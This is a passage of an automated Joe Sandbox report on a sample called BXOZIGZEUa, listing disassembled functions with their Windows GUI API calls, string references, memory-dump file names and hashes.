SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 0052CB33
PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 0052CB51

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$CaptureCursorSend$LoadPeekPostRelease
String ID:
API String ID: 291007519-0
Opcode ID: 194e9f901575b263eddd9f9153e84baefe9e683f39a95b77cb82f9e87a09e970
Instruction ID: 228783e8ead6777dad38275a5c100d1833b1f7731f967d2b2fad52a49490c7eb
Opcode Fuzzy Hash: 194e9f901575b263eddd9f9153e84baefe9e683f39a95b77cb82f9e87a09e970
Instruction Fuzzy Hash: E2517C71A00208AFCB21AFA0DC89ABEBFB9FF45344F508469E146E71A2DB719D44DB10

Function 0050F1BE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 286keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0050F1DC
GetWindowRect.USER32(?,?), ref: 0050F244
GetCursorPos.USER32(?), ref: 0050F28E

Strings

c, xrefs: 0050F268

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CursorRectStateWindow
String ID: c
API String ID: 3412758350-2927717585
Opcode ID: 8844ffedd837f43c810f7f80b2f159b76051dfb129162fdb5c1257ba943bb6f5
Instruction ID: 9149b3ce714639682dcfc9bdab2208a8f3df61c130fadc6b7c797e6aaa75e672
Opcode Fuzzy Hash: 8844ffedd837f43c810f7f80b2f159b76051dfb129162fdb5c1257ba943bb6f5
Instruction Fuzzy Hash: 2BB1E470A00205AFCF20DFA5D888AEEBBF6FF48314F14447EE946A7691DB309940CB65

Function 00531057 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00531061
GetSystemMenu.USER32(?,00000000,00000214,004F3060,00000000,00000000,00000001,?), ref: 005310C3
IsMenu.USER32(?), ref: 005310DC
IsMenu.USER32(?), ref: 005310F6
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0053112B
GetClassLongW.USER32(?,000000DE), ref: 00531141
GetWindowLongW.USER32(?,000000F0), ref: 0053118C

Strings

0, xrefs: 00531269

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Long$ClassH_prolog3_MessageSendSystemWindow
String ID: 0
API String ID: 859179710-4108050209
Opcode ID: d0ab2a0d06e7a4cf086ec172c2b09b78b5ee728735bc836440fb60caf00d2033
Instruction ID: bd9f7677e2aaa55f7b76a65f6a9285c364b438f9ccfea9a9e55a1133337b26de
Opcode Fuzzy Hash: d0ab2a0d06e7a4cf086ec172c2b09b78b5ee728735bc836440fb60caf00d2033
Instruction Fuzzy Hash: 55816F30500B45DFDB21DF65CC89BEEBBB8FF44701F24466AE8AA96291DB305A85CF44

Function 0053A7FB Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 138COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0054D2A2

Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2

Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA

Part of subcall function 0052EB3A: __EH_prolog3.LIBCMT ref: 0052EB41

Strings

PinState, xrefs: 0054D410
%sPane-%d%x, xrefs: 0054D310
%sPane-%d, xrefs: 0054D2F7
RectRecentDocked, xrefs: 0054D3A4
RecentFrameAlignment, xrefs: 0054D3C4
RecentRowIndex, xrefs: 0054D3D7
MRUWidth, xrefs: 0054D3FD
IsFloating, xrefs: 0054D3EA
RectRecentFloat, xrefs: 0054D391

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %sPane-%d$%sPane-%d%x$IsFloating$MRUWidth$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
API String ID: 3879667756-1120251949
Opcode ID: 9725133a9437691fc65ec1a32079cf287c8b15d067012fa2bbe42ad7021a0639
Instruction ID: 2421dcde345adc44d8b4de695e4e133f6cdc555121cd5dd55c666c7daa089fa9
Opcode Fuzzy Hash: 9725133a9437691fc65ec1a32079cf287c8b15d067012fa2bbe42ad7021a0639
Instruction Fuzzy Hash: 88518A31A0061AAFCF08DFA4CC99AEE7B72FF45314F00455DF9169B292DA75A904CB62

Function 00529521 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00529550
MonitorFromPoint.USER32(?,?,00000002), ref: 00529582
GetMonitorInfoW.USER32(00000000), ref: 00529589
CopyRect.USER32(0050B155,?), ref: 0052959B
SystemParametersInfoW.USER32(00000030,00000000,0050B155,00000000), ref: 005295AB
OffsetRect.USER32(?,0050B155,00000000), ref: 005295D5
OffsetRect.USER32(?,?,00000000), ref: 00529600
OffsetRect.USER32(?,00000000,00000000), ref: 0052962D
OffsetRect.USER32(?,00000000,?), ref: 00529652

Strings

(, xrefs: 0052957B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
String ID: (
API String ID: 4030222242-3887548279
Opcode ID: ae2578a7cb391cebdf6af7d5356afe191bf1072fbe24ac2ef3068a3ad307c498
Instruction ID: d091c28189551a9231b049c3a7db2af527decbd194502302130abf2165e6df77
Opcode Fuzzy Hash: ae2578a7cb391cebdf6af7d5356afe191bf1072fbe24ac2ef3068a3ad307c498
Instruction Fuzzy Hash: 23410771B002199FDB14DFA9D984AAEFBB9FF49300F64852DE505E7280CB70AD46CB50

Function 004DD6C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 78COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004DD6E4

Strings

DWriteCreateFactory, xrefs: 004DD769
D2D1.dll, xrefs: 004DD6F9
DWrite.dll, xrefs: 004DD750
D2D1CreateFactory, xrefs: 004DD719
D2D1MakeRotateMatrix, xrefs: 004DD743

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Initialize
String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
API String ID: 2538663250-1403614551
Opcode ID: d0ca7a98dd2ce125ae86b1f8500f275acc5658b9b6d2f91cb1d5433e185b5997
Instruction ID: 4691d2bc193894f44fc3470c159c142bcf631b84dc47cc3f0284e2099e000790
Opcode Fuzzy Hash: d0ca7a98dd2ce125ae86b1f8500f275acc5658b9b6d2f91cb1d5433e185b5997
Instruction Fuzzy Hash: C111E735F44729BA87116F39AC85937BF5AA7C1F58321163BF119D2360D9B8C940CB54

Function 005569ED Relevance: 16.9, APIs: 11, Instructions: 410windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00556AEF
GetCursorPos.USER32(?), ref: 00556B1E
GetParent.USER32(?), ref: 00556B86
ReleaseCapture.USER32 ref: 00556CCA
GetParent.USER32(?), ref: 00556CDB
SendMessageW.USER32(?,00000363,00000000,00000000), ref: 00556CF1
GetWindowRect.USER32(?,?), ref: 00556D36
GetParent.USER32(?), ref: 00556E13
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00556E22
GetParent.USER32(?), ref: 00556E2B
UpdateWindow.USER32(?), ref: 00556E36

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$Rect$Window$CaptureCursorEmptyInvalidateMessageReleaseSendUpdate
String ID:
API String ID: 2800639987-0
Opcode ID: 30780accac5812b08a6f006b2610b9fa2612b89147db7396c08c8a4e60b30090
Instruction ID: eff47910b73c1183dc5237aeaf76823a511824c165aeb22673941cacb951a77d
Opcode Fuzzy Hash: 30780accac5812b08a6f006b2610b9fa2612b89147db7396c08c8a4e60b30090
Instruction Fuzzy Hash: F0E17C31A00255EFCB149FA5C899EAEBBB9FF48701F15406AF846DB291CB359C44CB91

Function 0052018C Relevance: 16.7, APIs: 11, Instructions: 192timeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005201BF
ScreenToClient.USER32(?,?), ref: 005201CC
PtInRect.USER32(?,?,?), ref: 005201FA
PtInRect.USER32(?,?,?), ref: 0052021F
KillTimer.USER32(?,00000002), ref: 0052024F
InvalidateRect.USER32(?,?,00000001), ref: 0052026D
InvalidateRect.USER32(?,?,00000001), ref: 0052027B
_clock.LIBCMT ref: 00520290
KillTimer.USER32(?,00000001), ref: 00520395
ValidateRect.USER32(?,00000000), ref: 005203B1
RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 005203EF

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow_clock
String ID:
API String ID: 3482734790-0
Opcode ID: 9df70e3e8ba714c30a107b912842be12702e7d21547000e88fedf865b7bc37e4
Instruction ID: 3eecc33e2e009c58f2a4c9017ec5a4e9bd8226c42dac09a609df9ec869a3ddfd
Opcode Fuzzy Hash: 9df70e3e8ba714c30a107b912842be12702e7d21547000e88fedf865b7bc37e4
Instruction Fuzzy Hash: 07718131501A15EFCB20DF24D988ABEBBF5FF9A300F10582EE14AD61D2DB74A941DB50

Function 004DA6E4 Relevance: 16.6, APIs: 11, Instructions: 149windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004DA6EE
GetMenuItemCount.USER32(?), ref: 004DA720
GetSubMenu.USER32(?,?), ref: 004DA764
GetMenuState.USER32(?,?,00000400), ref: 004DA77D
GetSubMenu.USER32(?,?), ref: 004DA7EC
GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 004DA811
_wcslen.LIBCMT ref: 004DA868
AppendMenuW.USER32(00000000,00000010,00000000,?), ref: 004DA896
GetMenuItemCount.USER32(00000000), ref: 004DA8D5
GetMenuItemID.USER32(?,?), ref: 004DA90E
InsertMenuW.USER32(?,?,00000000,00000000), ref: 004DA924

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString_wcslen
String ID:
API String ID: 881407318-0
Opcode ID: b7ccf72034761604bc2d270d3d10dfdd7961e1043875506d73045154115fb08e
Instruction ID: 401a85a7ea71a345f4df937c91f7c8ce967b6c02deaa12f72bad61732afab91b
Opcode Fuzzy Hash: b7ccf72034761604bc2d270d3d10dfdd7961e1043875506d73045154115fb08e
Instruction Fuzzy Hash: F471E171841229AFCF20AF54DC9CBE9BBB5FF18310F1041EAE509A6261CB389E94DF55

Function 00536CF9 Relevance: 16.6, APIs: 11, Instructions: 142windowCOMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 00536D22
SetCapture.USER32 ref: 00536D35
PtInRect.USER32(?,?,?), ref: 00536D67
GetParent.USER32(?), ref: 00536D74
SendMessageW.USER32(?,?,?,00000000), ref: 00536D8E
CopyRect.USER32(?,?), ref: 00536D9E
IsRectEmpty.USER32(?), ref: 00536DAB
SetCapture.USER32(?,?,?,00000000), ref: 00536DC2
SetRectEmpty.USER32(?), ref: 00536DFA

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CaptureEmpty$CopyMessageParentSend
String ID:
API String ID: 3593567511-0
Opcode ID: 57487e74a1f38a47b99c1d6fca196eaf3612562da747f8261c76cb38cf0fbf4f
Instruction ID: 96d8ef06c1f86c09aef38141abc193d0e3321965c454f75d344d1a62140f7747
Opcode Fuzzy Hash: 57487e74a1f38a47b99c1d6fca196eaf3612562da747f8261c76cb38cf0fbf4f
Instruction Fuzzy Hash: 7A512776600209EFCF019FA4CC88AEE7BBAFF48301F144579F90ADA165DB759918DB60

Function 0053F436 Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0053F43D
FindResourceW.KERNEL32(?,?,00000005,00000024,0054EE2A,?,?,?), ref: 0053F473
LoadResource.KERNEL32(?,00000000,?,?), ref: 0053F47B

Part of subcall function 004E9054: UnhookWindowsHookEx.USER32(?), ref: 004E9084

LockResource.KERNEL32(?,00000024,0054EE2A,?,?,?), ref: 0053F48C
GetDesktopWindow.USER32 ref: 0053F4BF
IsWindowEnabled.USER32(?), ref: 0053F4CD
EnableWindow.USER32(?,00000000), ref: 0053F4DC

Part of subcall function 004ECD7C: IsWindowEnabled.USER32(?), ref: 004ECD85

Part of subcall function 004ECD97: EnableWindow.USER32(?,?), ref: 004ECDA8

EnableWindow.USER32(?,00000001), ref: 0053F5C1
GetActiveWindow.USER32 ref: 0053F5CC
SetActiveWindow.USER32(?,?,?), ref: 0053F5DA
FreeResource.KERNEL32(?,?,?), ref: 0053F5F6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 466d41cc379ccd93039d688ce9bb8ee309fa366aac5598861bfc79aa84265996
Instruction ID: b165724b847f037f0edda3e4d8b147a4354b8c75c856d0487116b8e1c98eca9a
Opcode Fuzzy Hash: 466d41cc379ccd93039d688ce9bb8ee309fa366aac5598861bfc79aa84265996
Instruction Fuzzy Hash: 4E516D30E00605DFCF21AFA68889BBEBFB1BF44715F24013EE102A62A1DB799945DB55

Function 004FB305 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 309timewindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004FB30C
SetCursor.USER32(00000040,004FBA9B,00000000,00000000,?), ref: 004FB3A6

Part of subcall function 004E03A2: __EH_prolog3.LIBCMT ref: 004E03A9
Part of subcall function 004E03A2: GetDC.USER32(00000000), ref: 004E03D5

Part of subcall function 005134C2: __EH_prolog3_GS.LIBCMT ref: 005134C9
Part of subcall function 005134C2: CreateRectRgnIndirect.GDI32(?), ref: 00513506
Part of subcall function 005134C2: CopyRect.USER32(?,?), ref: 0051351C
Part of subcall function 005134C2: InflateRect.USER32(?,?,?), ref: 00513532
Part of subcall function 005134C2: IntersectRect.USER32(?,?,?), ref: 00513540
Part of subcall function 005134C2: CreateRectRgnIndirect.GDI32(?), ref: 0051354A
Part of subcall function 005134C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0051355F
Part of subcall function 005134C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 005135C7

Part of subcall function 004E03F6: __EH_prolog3.LIBCMT ref: 004E03FD
Part of subcall function 004E03F6: ReleaseDC.USER32(?,00000000), ref: 004E041A

GetFocus.USER32 ref: 004FB445
SetTimer.USER32(?,00000014,000001F4,00000000), ref: 004FB505
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 004FB5AA
KillTimer.USER32(?,00000014), ref: 004FB6D6
SetTimer.USER32(?,00000014,000001F4,00000000), ref: 004FB6F3
UpdateWindow.USER32(?), ref: 004FB712

Strings

<L`, xrefs: 004FB69A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Create$Timer$H_prolog3H_prolog3_Indirect$CopyCursorFocusInflateIntersectKillMessageReleaseSendUpdateWindow
String ID: <L`
API String ID: 2399994607-3276711095
Opcode ID: ad78a2c3ead54af9e4c40ab34f6ad04265aab1b1bb448afda172fdf982bc1f95
Instruction ID: 155aca89ebd50ac9669979b4c4688237bd72dd1cf28d7ccf8099eb26eb23c2e9
Opcode Fuzzy Hash: ad78a2c3ead54af9e4c40ab34f6ad04265aab1b1bb448afda172fdf982bc1f95
Instruction Fuzzy Hash: 6CC170705006089FDF249F24C8C5BBA77A1EB45318F18427EFE199E3D6DB789844CBA9

Function 0054566E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 240windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0054283C: GdipGetImagePixelFormat.GDIPLUS(?,00646BF4,00000000,00000000,?,00545698,00000000,00000000,00646BF4), ref: 0054284C

_free.LIBCMT ref: 005457A1
_free.LIBCMT ref: 005457ED
GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00646BF4), ref: 005458B6
_free.LIBCMT ref: 005458E6

Part of subcall function 0054285E: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00545752,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00542872

GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00646BF4), ref: 00545962
_free.LIBCMT ref: 005459DD

Strings

&, xrefs: 005456EE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
String ID: &
API String ID: 4092590016-3042966939
Opcode ID: f961a57055eeb232bfa41b8d94d5e179c32773be3889d526fec97d0743275767
Instruction ID: f95ccdcd49da8d10bd70bd3ff6dd72a6089ee690ad0882d1b0a4dabc53710bb5
Opcode Fuzzy Hash: f961a57055eeb232bfa41b8d94d5e179c32773be3889d526fec97d0743275767
Instruction Fuzzy Hash: BDA16CB1900629DBCB319B14CC85BEDBBB4BB84318F1084E9E649A7252DB349EC5CF58

Function 0053C01A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 221timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 0053C054
KillTimer.USER32(?,?), ref: 0053C065
GetWindowRect.USER32(?,?), ref: 0053C083
ShowWindow.USER32(?,00000000,00000000), ref: 0053C0F0
ShowWindow.USER32(?,00000005,00000005,00000000), ref: 0053C13D
BringWindowToTop.USER32(?), ref: 0053C14C
BringWindowToTop.USER32(?), ref: 0053C154
SetTimer.USER32(?,00000001,00000000), ref: 0053C180

Part of subcall function 0050EC57: GetWindowRect.USER32(?,?), ref: 0050EC89

Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66

Strings

c, xrefs: 0053C102

Memory Dump Source

